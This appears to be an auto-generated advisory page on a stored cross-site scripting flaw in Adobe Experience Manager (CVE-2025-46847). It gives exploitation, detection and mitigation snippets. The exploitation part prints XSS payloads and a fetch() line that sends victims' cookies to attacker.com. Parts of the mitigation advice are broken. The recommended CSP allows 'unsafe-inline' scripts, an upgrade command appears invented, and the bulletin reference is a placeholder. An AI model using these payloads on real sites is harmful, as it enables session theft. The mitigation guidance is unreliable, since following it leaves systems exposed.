Adobe Experience Manager, Stored Cross-Site Scripting (XSS), CVE-2025-46847 (Critical)

Listen to this Post

How CVE-2025-46847 Works

Adobe Experience Manager (AEM) 6.5.22 and earlier fails to properly sanitize user-supplied input in form fields, allowing attackers with low privileges to inject malicious JavaScript payloads. When stored in vulnerable components, these scripts execute in the context of a victim’s browser upon accessing the compromised page. The attack leverages improper input validation in the WCM (Web Content Management) core components, where crafted HTML/script tags bypass filters.

DailyCVE Form

Platform: Adobe Experience Manager
Version: ≤ 6.5.22
Vulnerability: Stored XSS
Severity: Critical
Date: 06/13/2025

Prediction: Patch by 07/15/2025

What Undercode Say:

Exploitation

1. Payload Injection:

<script>alert(document.cookie)</script>

Submit via unprotected form fields (e.g., text components).

2. Exfiltration:

fetch('https://attacker.com/log?data='+btoa(document.cookie));

Detection

1. Scan Vulnerable Instances:

nuclei -t xss -u https://target-aem-instance

2. Manual Testing:

POST /content/forms/af/vulnerable-form.html HTTP/1.1
...
payload=<img src=x onerror=alert(1)>

Mitigation

1. Input Sanitization:

Filter filter = new XSSFilter();
String sanitized = filter.filter(rawInput);

2. Content Security Policy (CSP):

Header set Content-Security-Policy "default-src 'self'; script-src 'unsafe-inline'"

3. Patch Upgrade:

aem install --update --version 6.5.23

4. WAF Rules:

location / {
modsecurity_rules 'SecRule ARGS "@detectXSS" deny';
}

5. Log Monitoring:

grep -r "script>" /var/log/aem/access.log

References

  • Adobe Security Bulletin: APSB25-XX
  • CWE-79: Improper Neutralization of Input During Web Page Generation
  • CVSS:4.0 AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top